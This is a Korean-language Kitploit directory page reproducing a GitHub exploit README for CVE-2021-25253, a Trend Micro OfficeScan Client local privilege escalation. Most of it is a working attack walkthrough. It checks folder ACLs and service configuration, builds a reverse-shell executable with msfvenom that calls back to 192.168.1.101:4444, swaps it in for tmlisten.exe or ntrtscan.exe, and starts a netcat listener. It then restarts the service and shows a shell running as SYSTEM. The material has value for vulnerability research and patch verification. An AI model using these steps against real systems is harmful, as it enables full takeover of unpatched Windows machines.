Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-25253 — Trend Micro OfficeScan Client <=10.0용 로컬 권한 상승 익스플로잇으로, 설치 폴더의 잘못 구성된 ACL을 통해 서비스 바이너리 교체로 시스템 수준 접근을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/msd0pe-1/cve-2021-25253
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationMisconfiguration
GitHubmsd0pe-1/cve-2021-25253

CVE-2021-25253

Trend Micro OfficeScan Client <=10.0용 로컬 권한 상승 익스플로잇으로, 설치 폴더의 잘못 구성된 ACL을 통해 서비스 바이너리 교체로 시스템 수준 접근을 가능하게 합니다.

저장소 보기
123년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
root@kitploit:~
#########################################################################
#                                                                       #
#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE  #
#  Date: 2023/05/04                                                     #
#  Exploit Author: msd0pe                                               #
#  Vendor Homepage: https://www.trendmicro.com                          #
#  My Github: https://github.com/msd0pe-1                               # 
#                                                                       # 
#########################################################################

Trend Micro OfficeScan Client:

버전 10.0 이하에서는 OfficeScan 클라이언트 폴더에 잘못된 ACL 권한이 있어 공격자가 서비스를 통해 시스템 수준으로 권한을 상승시킬 수 있습니다. 이 취약점은 특별한 권한이 필요하지 않습니다.

폴더 권한 확인:

root@kitploit:~
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

서비스 정보 확인:

root@kitploit:~
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem

OR

root@kitploit:~
    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

리버스 셸 생성:

root@kitploit:~
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe

OR

root@kitploit:~
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

리버스 셸을 C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe 또는 C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe에 업로드

리스너 시작

root@kitploit:~
    > nc -lvp 4444

서비스/서버 재시작

root@kitploit:~
    > sc stop tmlisten
    > sc start tmlisten

OR

root@kitploit:~
    > sc stop ntrtscan
    > sc start ntrtscan

OR

root@kitploit:~
    > shutdown /r

즐기세요 !

root@kitploit:~
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system
도구 다운로드